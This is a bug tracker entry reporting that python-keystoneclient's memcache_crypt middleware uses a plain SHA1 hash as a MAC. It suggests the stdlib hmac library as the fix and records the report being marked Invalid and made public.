Improper use of Hash for MAC
Bug #1191466 reported by
Donald Stufft
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
OpenStack Security Advisory |
Invalid
|
Undecided
|
Unassigned | ||
python-keystoneclient |
Invalid
|
Undecided
|
Unassigned |
Bug Description
I noticed that within python-keystone client the memcache_crypt middleware uses a simple sha1 as a MAC. This is bad to do because a general hash function is not designed to work as a MAC and thus are often vulnerable to a number of attacks. I suggest that instead the hmac library in the python stdlib is used.
The code in question is here:
https:/
Changed in ossa: | |
status: | Incomplete → Invalid |
information type: | Private Security → Public |
To post a comment you must log in.
Several improvements are being rolled up in a security advisory going out Wednesday. We'll see if this still applies after that one is disclosed.